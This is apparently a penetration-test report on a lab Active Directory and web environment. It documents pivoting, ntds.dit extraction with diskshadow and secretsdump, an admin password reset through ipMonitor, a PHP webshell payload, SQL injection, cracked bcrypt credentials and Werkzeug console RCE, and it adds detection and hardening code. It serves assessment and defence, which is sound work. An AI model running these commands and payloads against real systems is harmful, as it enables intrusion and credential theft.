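Both Kerberoasts in this report (the fake-SPN roast of KSALINAS in trilocor.local earlier, and the roast of svc_datakeeper across the trust here) appear on the issuing KDC as event 4769 with TicketEncryptionType 0x17 (RC4, the etype 23 that hashcat mode 13100 cracks) for a user-type service account; the targeted variant is preceded by a 5136 event adding a servicePrincipalName value to a user object. The Python below is an added example, not code from the report or from Rubeus: it filters RC4 service-ticket requests, flags requesters that roast many services in a short window, and correlates an SPN write with a later ticket request for the same account. Event fields follow the Windows event XML names; the sample events, the jdoe account, the client address and the thresholds are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

RC4_HMAC = "0x17"        # 4769 TicketEncryptionType for RC4-HMAC (Kerberos etype 23)
VALUE_ADDED = "%%14674"  # 5136 OperationType code for "Value Added"


def rc4_service_ticket_requests(events: Iterable[Dict]) -> List[Dict]:
    """Successful 4769 events where an RC4 service ticket was issued for a user-type service account."""
    hits = []
    for e in events:
        if e.get("EventID") != 4769 or e.get("Status") != "0x0":
            continue
        if e.get("TicketEncryptionType", "").lower() != RC4_HMAC:
            continue
        service = e.get("ServiceName", "")
        if service.lower() == "krbtgt" or service.endswith("$"):    # TGTs and machine accounts
            continue
        hits.append(e)
    return hits


def burst_requesters(rc4_events: Iterable[Dict], threshold: int = 5,
                     window: timedelta = timedelta(minutes=5)) -> Dict[str, int]:
    """Requesters that obtained RC4 tickets for >= threshold distinct services inside one window
    (the signature of an untargeted roast of every SPN in the domain)."""
    by_user = defaultdict(list)
    for e in rc4_events:
        by_user[e["TargetUserName"].lower()].append(
            (datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"].lower()))
    result: Dict[str, int] = {}
    for user, items in by_user.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            services = {s for t, s in items[i:] if t - t0 <= window}
            if len(services) >= threshold:
                result[user] = max(result.get(user, 0), len(services))
    return result


def spn_writes_on_users(events: Iterable[Dict]) -> List[Dict]:
    """5136 events where a servicePrincipalName value was added to a user object."""
    return [e for e in events if e.get("EventID") == 5136 and e.get("ObjectClass") == "user"
            and e.get("AttributeLDAPDisplayName") == "servicePrincipalName"
            and e.get("OperationType") == VALUE_ADDED]


def correlate_targeted_kerberoast(events: List[Dict],
                                  window: timedelta = timedelta(hours=24)) -> List[Dict]:
    """Pair an SPN added to a user with a later RC4 ticket request for that same account."""
    alerts = []
    for w in spn_writes_on_users(events):
        rdn = w["ObjectDN"].split(",")[0]
        target = (rdn[3:] if rdn.upper().startswith("CN=") else rdn).lower()
        t_w = datetime.fromisoformat(w["TimeCreated"])
        for tgs in rc4_service_ticket_requests(events):
            t_tgs = datetime.fromisoformat(tgs["TimeCreated"])
            if tgs["ServiceName"].lower() == target and timedelta(0) <= t_tgs - t_w <= window:
                alerts.append({"service_account": target, "spn_written_by": w["SubjectUserName"],
                               "spn": w["AttributeValue"], "requested_by": tgs["TargetUserName"],
                               "client": tgs.get("IpAddress", "")})
    return alerts


def _tgs(time: str, user: str, service: str, etype: str = "0x17",
         ip: str = "::ffff:172.16.139.10") -> Dict:
    """Constructed 4769 record."""
    return {"EventID": 4769, "TimeCreated": time, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": "0x0", "IpAddress": ip}


# Constructed sample: the SPN write and targeted roast from the first chain, an AES ticket,
# a machine-account ticket, and a six-service burst from a second (made-up) account.
SAMPLE_EVENTS = [
    {"EventID": 5136, "TimeCreated": "2024-06-11T02:00:00", "SubjectUserName": "JFLEMMING",
     "ObjectDN": "CN=ksalinas,CN=Users,DC=trilocor,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "nonexistent/BLAHBLAH",
     "OperationType": VALUE_ADDED},
    _tgs("2024-06-11T02:05:00", "JFLEMMING@TRILOCOR.LOCAL", "ksalinas"),
    _tgs("2024-06-11T02:06:00", "pthorpe@TRILOCOR.LOCAL", "svc_mssql", etype="0x12"),
    _tgs("2024-06-11T02:07:00", "pthorpe@TRILOCOR.LOCAL", "WS01$"),
] + [_tgs(f"2024-06-11T03:00:{i:02d}", "jdoe@TRILOCOR.LOCAL", f"svc_{i}") for i in range(6)]

if __name__ == "__main__":
    hits = rc4_service_ticket_requests(SAMPLE_EVENTS)
    print("burst:", burst_requesters(hits))
    print("targeted:", correlate_targeted_kerberoast(SAMPLE_EVENTS))
```

The RC4 filter only has signal where service accounts are AES-enabled (the Rubeus output above shows svc_datakeeper supports RC4_HMAC_DEFAULT only, so every ticket for it is RC4); the SPN-write correlation works regardless, and a servicePrincipalName like nonexistent/BLAHBLAH added by a help-desk account is worth an alert on its own.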

Now the tester has the password for the svc_datakeeper user, but to reach that network the tester had to
set up a tunnel using ligolo-ng.

The machine DC01 is connected to another network, 172.16.210.3/24.


So the tester moved the ligolo-ng agent.exe to the DC01 machine using the SMB share.


The tester created a listener on ligolo-ng on port 11601, then started the ligolo-ng tunnel for the
172.16.210.0/24 range by running the agent on DC01:

*Evil-WinRM* PS C:\users\public> ./agent.exe -connect 172.16.139.10:11601 -ignore-cert

Now the tester is able to log in using the evil-winrm tool.

From further enumeration, the tester detected that user svc_datakeeper is a member of 'Event Log Readers'.


After checking the event logs, the tester found the username and password of the svc_veracrypt user.

With these credentials, the tester was able to log in as svc_veracrypt.

While checking whoami /priv, the tester detected SeBackupPrivilege for the svc_veracrypt user:

*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

The tester needs the ntds.dit file along with the SYSTEM hive to extract the hashes. On the Kali Linux
machine, the tester created a .dsh file with the nano editor. In this file, the tester instructs
diskshadow to create a shadow copy of the C: drive and expose it as the Z: drive, with raj as its alias.
The alias and drive letter can be anything the tester wants. After creating the .dsh file, the tester
used unix2dos to convert the file's encoding and line endings to ones compatible with the Windows
machine.


nano raj.dsh

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

unix2dos raj.dsh

Now the tester can run diskshadow with this script:

diskshadow /s raj.dsh

Then the tester ran robocopy /b z:\windows\ntds . ntds.dit:

*Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds . ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------


  Started : Sunday, June 16, 2024 5:18:07 AM
   Source : z:\windows\ntds\
     Dest : C:\temp\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    z:\windows\ntds\
            New File              40.0 m        ntds.dit
[[ SNIP ]]
  100%
  100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   40.00 m   40.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00

   Speed :            68871986 Bytes/sec.
   Speed :            3940.886 MegaBytes/min.
   Ended : Sunday, June 16, 2024 5:18:08 AM

Then the tester ran the command to save a copy of the SYSTEM hive:

*Evil-WinRM* PS C:\temp> reg save hklm\system c:\Temp\system
The operation completed successfully.

Now the tester can download both files to the local machine using evil-winrm and use the secretsdump.py
tool to extract the hashes:

╭─kali@kali ~/Desktop/CPTS/DC02
╰─$ secretsdump.py -ntds ntds.dit -system system local
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x89a11ee03c83c2e093cc9f14ef3800ab
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 81db2a47d32784558062c54bfad8d792
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[[ REDACTED ]]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:[[ REDACTED ]]:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:[[ REDACTED ]]:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:[[ REDACTED ]]:::
[[ SNIP ]]

Now the tester is able to log in to the machine as Administrator using evil-winrm.


The tester then ran a ping sweep, which detected live IPs including the ADMIN01 machine at
172.16.210.21:

1..254 | % {"172.16.210.$($_): $(Test-Connection -count 1 -comp 172.16.210.$($_) -quiet)"}

The tester ran an nmap scan against the IP and detected that port 8080 was open, running ipMonitor 11.2:

# Nmap 7.94SVN scan initiated Thu Jun 13 02:40:52 2024 as: nmap -sCV -Pn -vv --open --disable-arp-ping -oN nmap/ADMIN01.txt 172.16.210.21
Nmap scan report for 172.16.210.21
Host is up, received user-set (0.19s latency).
Scanned at 2024-06-13 02:40:52 PDT for 96s
Not shown: 996 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE       REASON  VERSION
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack
8080/tcp open  http          syn-ack MediaHouse ipMonitor httpd 11.2
|_http-favicon: Unknown favicon MD5: 507B3CE063F4241734C985866F560AB9
|_http-server-header: ipMonitor 11.2
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-title: ipMonitor - Log In
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 61832/tcp): CLEAN (Timeout)
|   Check 2 (port 43995/tcp): CLEAN (Timeout)
|   Check 3 (port 60997/udp): CLEAN (Timeout)
|   Check 4 (port 43688/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: ADMIN01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:20:b0 (VMware)
| Names:
|   ADMIN01<20>          Flags: <unique><active>
|   ADMIN01<00>          Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
| Statistics:
|   00:50:56:94:20:b0:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-time:
|   date: 2024-06-13T12:22:30
|_  start_date: N/A
|_clock-skew: 2h40m41s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 13 02:42:28 2024 -- 1 IP address (1 host up) scanned in 96.63 seconds

The tester had previously found the encrypted IPMI password in the Documents directory on DC02.

Figure 17 - Documents Folder

The encrypted password:

Figure 18 - IPMI CREDS

The tester is able to decrypt it using PowerShell:

*Evil-WinRM* PS C:\Users\Administrator\Documents> copy svc_ipmi.Cred credential.xml
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls

    Directory: C:\Users\Administrator\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/26/2022   7:09 AM                PSTrueCrypt
d-----        8/22/2022  10:52 AM                WindowsPowerShell
-a----        7/26/2022   7:09 AM          19561 automssqlbackup.ps1
-a----        8/18/2022   4:00 AM           1438 credential.xml
-a----        8/18/2022   3:57 AM           2714 Fan Control.ps1
-a----        6/13/2024   6:39 AM       11849245 LaZagne.exe
-a----        7/26/2022   7:10 AM           2326 nas_ipmi_turn_on_map_drives.vbs
-a----        7/26/2022   7:10 AM          11178 PSTimeMachine.ps1
-a----        7/26/2022   7:10 AM           7609 Set-iLOIPMI.ps1
-a----        8/18/2022   4:00 AM           1438 svc_ipmi.Cred

*Evil-WinRM* PS C:\Users\Administrator\Documents> $credential = Import-Clixml -Path "credential.xml"
*Evil-WinRM* PS C:\Users\Administrator\Documents> $password = $credential.GetNetworkCredential().Password
*Evil-WinRM* PS C:\Users\Administrator\Documents> $password
[[ REDACTED PASSWORD ]]

With this password the tester logged in to the admin panel at http://172.16.210.21:8080/.

The tester then added a monitor for ADMIN01, added a new "external process" action to its alert, set the variables as follows and saved it:

Exec. name: cmd.exe
Directory: C:\Windows\System32
Startup Dir: C:\Windows\System32



Then the tester ran 'Force Test', selected the monitor and, in the exec parameters, changed the Administrator password:

/c "net user administrator [[ REDACTED ]]"

Now the tester can log in to ADMIN01 with the new Administrator password:


evil-winrm -i 172.16.210.21 -u administrator -p [[ REDACTED ]]


6 Remediation Summary
As a result of this assessment there are several opportunities for Acme to strengthen its internal
network security. Remediation efforts are prioritized below, starting with those that will likely take the
least amount of time and effort to complete. Acme should ensure that all remediation steps and
mitigating controls are carefully planned and tested to prevent any service disruption or loss of data.

6.1 Short Term


SHORT TERM REMEDIATION:

• Set strong (24+ character) passwords on all SPN accounts
• Enforce a password change for all users because of the domain compromise
• Give employees security awareness training

6.2 Medium Term

MEDIUM TERM REMEDIATION:

• Disable LLMNR and NBT-NS wherever possible
• Set up MDR and EDR
• Update all applications
• Restrict access from malicious IPs

6.3 Long Term


LONG TERM REMEDIATION:

• Perform ongoing internal network vulnerability assessments and domain password audits
• Perform periodic Active Directory security assessments
• Educate systems and network administrators and developers on security hardening best practices
• Enhance network segmentation to isolate critical hosts and limit the effects of an internal compromise

7 Technical Findings Details

1. Remote Code Execution (RCE) - Critical

CWE: CWE-434: Unrestricted Upload of File with Dangerous Type
CVSS 3.1: 9.0 / CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
Root Cause: The web application is vulnerable to Unrestricted Upload of File with Dangerous Type and to SQL injection; by chaining them, a malicious user can retrieve the actual path of the uploaded file and execute commands on the server.
Impact: The impact of unrestricted file uploads and SQL injection includes unauthorized code execution, data breaches, server compromise, data loss, service disruption, and potential legal and reputational damage to the organization.
Affected Component: http://securetransfer-dev.trilocor.local/storage/2_31159b[ SNIP ]d84.php?cmd=[command here]
Remediation: To mitigate risks from unrestricted file uploads and SQL injection, enforce file type validation, size limits, name sanitization, secure storage, proper permissions, parameterized queries, input validation, least privilege access, error handling, and regular security audits.
References: -

Finding Evidence
A malicious user has uploaded a web shell to the server and is able to obtain a reverse shell using the payload below.

1. A malicious user can register an account on http://securetransfer-dev.trilocor.local and log in to the dashboard.

2. The user is able to upload any file they want; there is no restriction on the file type or content.

3. The malicious user can chain the SQLi vulnerability here and find the actual path of the uploaded file:

sqlmap -r download.txt --dbms=mysql --dbs -D securetransfer -T files -C real_path --dump

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.5#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[[SNIP]]....
[20:29:47] [INFO] resumed: /var/www/html/storage/2_31159bec-1565-427b-a168-f25dc34a7d84.php
Database: securetransfer
Table: files
[1 entry]
+------------------------------------------------------------------+
| real_path                                                        |
+------------------------------------------------------------------+
| /var/www/html/storage/2_31159bec-[[ REDACTED ]]4a7d84.php        |
+------------------------------------------------------------------+

[20:29:47] [INFO] table 'securetransfer.files' dumped to CSV file '[[SNIP]]...

4. The malicious user can access that path and check for command injection using the payload below:

?cmd=whoami;id

5. The attacker is then able to obtain a reverse shell with a payload and get a shell.
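One way to implement the file type validation, name sanitization and secure storage that the remediation above calls for, as an added example that is not code from this report or from the securetransfer application (the allowed types, the size limit and the storage directory are assumptions):

```python
import os
import secrets

# Allowlisted extensions and the magic bytes the content must start with.
# Both checks must agree: the client-supplied name alone is never trusted.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "pdf": (b"%PDF-",),
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024  # assumed limit
# Assumed storage location outside the web root, so nothing uploaded can be
# requested (let alone executed) through the web server.
STORAGE_DIR = "/srv/securetransfer/uploads"


def validate_upload(client_filename: str, content: bytes):
    """Return (True, stored_name) for an acceptable upload or (False, reason)."""
    if len(content) == 0 or len(content) > MAX_UPLOAD_BYTES:
        return False, "size"
    # Drop any directory components the client sent ("../x.png", "..\\x.png").
    base = os.path.basename(client_filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) != 2:
        # No extension at all, or a double extension such as shell.php.png.
        return False, "extension"
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        return False, "extension"
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        # Name says image, content does not: reject rather than trust the name.
        return False, "content"
    # Server-chosen random name: the original name never reaches the filesystem,
    # and a user cannot predict the URL of another user's file.
    stored_name = f"{secrets.token_hex(16)}.{ext}"
    return True, stored_name


def store_upload(client_filename: str, content: bytes):
    """Return the full storage path for an accepted upload, else None."""
    ok, result = validate_upload(client_filename, content)
    if not ok:
        return None
    return os.path.join(STORAGE_DIR, result)
```

The two checks that matter most for this finding are the single allowlisted extension (so a `.php` or `.php.png` name is refused) and the content check (so PHP code carrying a `.png` name is refused); the random name and the out-of-webroot directory mean that even a file that slips through is not reachable as a URL the way `/storage/<id>.php` was here.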



2. SQL Injection (SQLi) - High

CWE: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSS 3.1: 8.8 / CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Root Cause: The web application processed user input in an insecure manner and was thus vulnerable to SQL injection. In an SQL injection attack, special input values in the web application are used to influence the application's SQL statements to its database. Depending on the database used and the design of the application, this may make it possible to read and modify the data stored in the database, perform administrative actions (e.g., shut down the DBMS), or in some cases even gain code execution and the accompanying complete control over the vulnerable server.
Impact: The impact of SQL injection can range from unauthorized access to sensitive data, manipulation or deletion of database records, escalation of privileges, complete system compromise, service disruption, theft of intellectual property, and significant damage to the organization's reputation and financial losses due to legal repercussions and loss of customer trust.
Affected Component: http://securetransfer-dev.trilocor.local/download.php?file=*
Remediation:
• Use prepared statements throughout the application to effectively avoid SQL injection vulnerabilities. Prepared statements are parameterized statements and ensure that even if input values are manipulated, an attacker is unable to change the original intent of an SQL statement.
• Use existing stored procedures by default where possible. Typically, stored procedures are implemented as secure parameterized queries and thus protect against SQL injections.
• Always validate all user input. Ensure that only input that is expected and valid for the application is accepted. Reject invalid input rather than attempting to sanitize potentially malicious input.
• To reduce the potential damage of a successful SQL injection attack, minimize the privileges assigned to the database user the application uses, according to the principle of least privilege.
• For detailed information and assistance on how to prevent SQL injection vulnerabilities, see OWASP's linked SQL Injection Prevention Cheat Sheet.
References: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

Finding Evidence
We identified an SQL injection vulnerability in the web application and were able to access stored data
in the database as a result.

TODO: technical description

SQL injection is a common server-side vulnerability in web applications. It occurs when software
developers create dynamic database queries that contain user input. In an attack, user input is crafted
in such a way that the originally intended action of an SQL statement is changed. SQL injection
vulnerabilities result from an application dynamically constructing database queries insecurely and
failing to properly validate user input. They are based on the fact that the SQL language basically does not
distinguish between control characters and data characters. In order to use a control character in the
data part of an SQL statement, it must be encoded or escaped appropriately beforehand.

An SQL injection attack is therefore essentially carried out by inserting a control character such as '
(single apostrophe) into the user input to place new commands that were not present in the original
SQL statement. A simple example will demonstrate this process. The following SELECT statement
contains a variable userId. The purpose of this statement is to get the data of a user with a specific user id
from the Users table:

sqlStmnt = 'SELECT * FROM Users WHERE UserId = ' + userId;

An attacker could now use special user input to change the original intent of the SQL statement. For
example, they could use the string ' or 1=1 as user input. In this case, the application would construct the
following SQL statement:

sqlStmnt = 'SELECT * FROM Users WHERE UserId = ' + ' or 1=1;

Instead of the data of a user with a specific user ID, the data of all users in the table is now returned to
the attacker after executing the statement. This gives an attacker the ability to control the SQL statement
in their own favor.

There are a number of variants of SQL injection vulnerabilities, attacks and techniques that occur in
different situations and depending on the database system used. However, what they all have in
common is that, as in the example above, user input is always used to dynamically construct SQL
statements. Successful SQL injection attacks can have far-reaching consequences. One would be the
loss of confidentiality and integrity of the stored data. Attackers could gain read and possibly write
access to sensitive data in the database. SQL injection could also compromise the authentication and
authorization of the web application, allowing attackers to bypass existing access controls. In some
cases, SQL injection can also be used to gain code execution, allowing an attacker to gain complete
control over the vulnerable server.
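To make the mechanism and the prepared-statement fix concrete, here is an added example that is not part of this report and not the tested application's code. It builds the Users table from the description above in an in-memory SQLite database (sample rows are constructed) and runs the concatenated statement beside a parameterized one. Because the statement above concatenates userId without quotes, the injected input used here is the numeric-context form `2 or 1=1` rather than the quoted form.

```python
import sqlite3


def make_db():
    """In-memory Users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER PRIMARY KEY, Name TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn


def lookup_vulnerable(conn, user_id: str):
    """String concatenation, exactly the shape of
    sqlStmnt = 'SELECT * FROM Users WHERE UserId = ' + userId
    The input becomes part of the SQL text, so 'or 1=1' widens the WHERE clause."""
    sql = "SELECT * FROM Users WHERE UserId = " + user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id: str):
    """Prepared statement: the driver binds user_id as a value, never as SQL text.
    '2 or 1=1' is compared as one opaque value and matches nothing."""
    return conn.execute("SELECT * FROM Users WHERE UserId = ?", (user_id,)).fetchall()


def lookup_validated(conn, user_id: str):
    """Input validation plus binding: only a whole number is an acceptable UserId,
    anything else is rejected outright instead of being 'cleaned up'."""
    if not user_id.isdigit():
        raise ValueError("UserId must be numeric")
    return conn.execute("SELECT * FROM Users WHERE UserId = ?", (int(user_id),)).fetchall()
```

Run against the same three-row table, `lookup_vulnerable` returns one row for `2` and all three rows for `2 or 1=1`, while `lookup_parameterized` returns one row for `2` and nothing for the injected string; `lookup_validated` additionally refuses the injected string before any query is built, which is the validation the remediation recommends on top of prepared statements.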


3. Account takeover - High

CWE: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
CVSS 3.1: 8.5 / CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
Root Cause: Through RCE, an attacker can access files saved inside the server, including the database username and password, and the database configuration file. From there, the attacker can obtain data from a new application at http://osticketapp.trilocor.local. Additionally, the attacker can retrieve usernames and password hashes. All of this led to the discovery of another domain, http://gogsusdev01.trilocor.local.
Impact: The impact of the vulnerability is severe, as it allows an attacker to gain administrative access to the web application by exploiting weak password hashes obtained from the Docker configuration file. This enables the attacker to take over accounts, potentially compromising sensitive data, altering application settings, and executing unauthorized actions within the system.
Affected Component: http://osticketapp.trilocor.local
Remediation: To mitigate account takeover via RCE, secure configuration files, use strong password hashing, enforce access controls, conduct regular audits, update software, monitor logs, segregate environments, and implement multi-factor authentication (MFA).
References: -

Finding Evidence
1. From the internal recon we discovered a README file that revealed a new subdomain, http://osticketapp.trilocor.local.

2. From the same location, we discovered a few usernames and the admin email:
user: Administrator
hash: $2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2QiQKyH88.
mail: admin@trilocor.local

[[SNIP]]
/*!40000 ALTER TABLE `ost_staff` DISABLE KEYS */;
INSERT INTO `ost_staff` VALUES
(1,1,1,'Administrator','Administrator','Administrator','$2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2QiQKyH88.',NULL,'admin@trilocor.local','',NULL,'','',NULL,NULL,NULL,NULL,1,1,1,0,0,0,0,25,0,'none','Letter',NULL,'{\"user.create\":1,\"user.delete\":1,\"user.edit\":1,\"user.manage\":1,
UNLOCK TABLES;
[[SNIP]]

3. The hash is a bcrypt hash; it is crackable using hashcat:


╭─kali@kali ~/Desktop/CPTS/hash
╰─$ hashcat -m 3200 os-ticket.txt ~/Tools/wordlist/rockyou.txt

hashcat (v6.2.6) starting [[SNIP]].....

$2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2QiQKyH88.:administracion

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2...KyH88.
Time.Started.....: Thu Jun 6 21:00:53 2024 (1 min, 34 secs)

[[SNIP]].....

4. The attacker is able to log in to the application and finds the new subdomain http://gogsusdev01.trilocor.local.

4. Privilege Escalation On API - High

CWE: CWE-284: Improper Access Control
CVSS 3.1: 7.5 / CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Root Cause: The vulnerability in question allows a normal user to escalate their privileges to those of an admin user through the API's update function. This type of vulnerability can have severe consequences, as it enables unauthorized users to perform actions that should be restricted to administrators, such as accessing sensitive data, modifying critical system settings, or managing other users.
Impact:
• Unauthorized Access: Attackers can gain unauthorized access to admin-level functions, leading to potential data breaches and exposure of sensitive information.
• Data Integrity Issues: Malicious users can modify or delete critical data, compromising the integrity and reliability of the system.
• Service Disruption: Unauthorized changes to system settings or user roles can disrupt the normal operation of the service, leading to downtime or degraded performance.
• Compliance Violations: Exploitation of this vulnerability can result in violations of data protection regulations and standards, potentially leading to legal and financial repercussions.
Affected Component: http://uat01-eu.intranet.trilocor.local
Remediation: To mitigate privilege escalation, secure repository access, validate API inputs, enforce strong authentication and authorization, follow the least privilege principle, implement comprehensive logging and auditing, conduct regular security reviews, apply rate limiting and monitoring, and ensure user roles cannot be modified through user-controlled inputs.
References: -
Finding Evidence
1. A malicious user creates an account on http://uat01-eu.intranet.trilocor.local.

2. While checking the repositories, the user can discover a repository belonging to the administrator user.

3. That repository discloses information about the API applications in use.

4. Register a user on the application. In the update profile API, the malicious user can add an additional parameter that changes the role to admin.

5. This leads to a normal user escalating privileges to an admin user.
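The update-profile weakness described above is a mass-assignment problem: the handler copies whatever fields the client sends, including the role. The following added example is not the application's code (the field names, the two role values and the profile shape are assumptions); it shows the vulnerable merge beside an allowlisted version that also reports which keys it refused, which is the signal worth logging because a legitimate client never sends them, and a separate admin-only path that is the only way a role may change.

```python
# Fields a user may change about themselves. 'role' (and 'id') are deliberately
# absent: a role can only change through the admin-only set_role() below.
SELF_UPDATABLE = frozenset({"display_name", "email", "bio"})
VALID_ROLES = frozenset({"user", "admin"})  # assumed role values


def update_profile_vulnerable(profile: dict, body: dict) -> dict:
    """Merges every key of the request body into the stored profile.
    A body containing "role": "admin" therefore silently promotes the caller."""
    updated = dict(profile)
    updated.update(body)
    return updated


def update_profile_hardened(profile: dict, body: dict):
    """Copies only allowlisted keys. Returns (new_profile, rejected_keys);
    rejected_keys is what the API should log and alert on."""
    updated = dict(profile)
    rejected = []
    for key, value in body.items():
        if key in SELF_UPDATABLE:
            updated[key] = value
        else:
            rejected.append(key)
    return updated, sorted(rejected)


def set_role(actor: dict, target: dict, new_role: str) -> dict:
    """Role changes are a distinct, server-authorized operation: the decision is
    made from the authenticated actor's stored role, never from request data."""
    if actor.get("role") != "admin":
        raise PermissionError("only admins may change roles")
    if new_role not in VALID_ROLES:
        raise ValueError("unknown role")
    updated = dict(target)
    updated["role"] = new_role
    return updated
```

With a stored profile whose role is `user` and a request body of `{"display_name": "M", "role": "admin"}`, the vulnerable handler returns a profile with role `admin`; the hardened one returns role `user`, applies only `display_name`, and reports `["role"]` as rejected.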

5. Remote Code Execution (RCE) On API - Critical

CWE: TODO CWE
CVSS 3.1: 9.0 / CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
Root Cause: The vulnerability allows an attacker to execute arbitrary PHP code through the Support Ticket API by injecting a payload in the ticket creation process. This enables unauthorized access to sensitive files on the server, potentially leading to further exploitation such as deploying a reverse shell.
Impact: Unauthorized Code Execution: Attackers can execute arbitrary PHP code on the server, leading to data breaches, service disruptions, and unauthorized access to system resources.
Affected Component: http://gogsusdev01.trilocor.local
Remediation: Input Validation: Implement strict input validation and sanitization to prevent injection attacks.
References: -

Finding Evidence
On the add Support Ticket API we can create a ticket containing our payload:

<?=`$_GET[0]`?>

We can then see the ticket through the support API.

Go to the export ticket endpoint, append .php to the parameter and send the request.

Now the malicious user can access the PHP file we exported.

Now we can obtain a reverse shell on the attacker machine.


6. Werkzeug console RCE via WEBSVC to SRVADM - High

CWE: TODO CWE
CVSS 3.1: 7.5 / CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
Root Cause: The vulnerability involves exploiting the Werkzeug console to achieve Remote Code Execution (RCE) on a Linux system. This can subsequently lead to privilege escalation from a web service user to a system administrator (srvadm), granting unauthorized access and control over the server.
Impact:
• Remote Code Execution (RCE): Allows attackers to execute commands on the server remotely, potentially compromising data integrity, confidentiality, and availability.
• Privilege Escalation: Elevates attacker privileges from a lower-level web service user to a higher-level system administrator, enabling broader access to sensitive system resources.
Affected Component: WEB-NIX01 | http://trilocor.local:7777/console
Remediation:
• Update and Patch: Apply security updates promptly to mitigate known vulnerabilities in Werkzeug and other software components.
• Access Control: Implement strict access controls and segregation of privileges to limit the impact of potential RCE attacks.
• Monitoring and Logging: Establish comprehensive monitoring and logging mechanisms to detect suspicious activities and potential RCE attempts early.
References: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug

Finding Evidence
Logged in to the machine as the websrv user and checking the processes running as srvadm, the malicious user can see the budget calculator application running as srvadm.

We already know that Werkzeug is running at http://trilocor.local:7777/console. Now the attacker is able to create an exploit using https://book.hacktricks.xyz.

Running this exploit will give the password for the console.

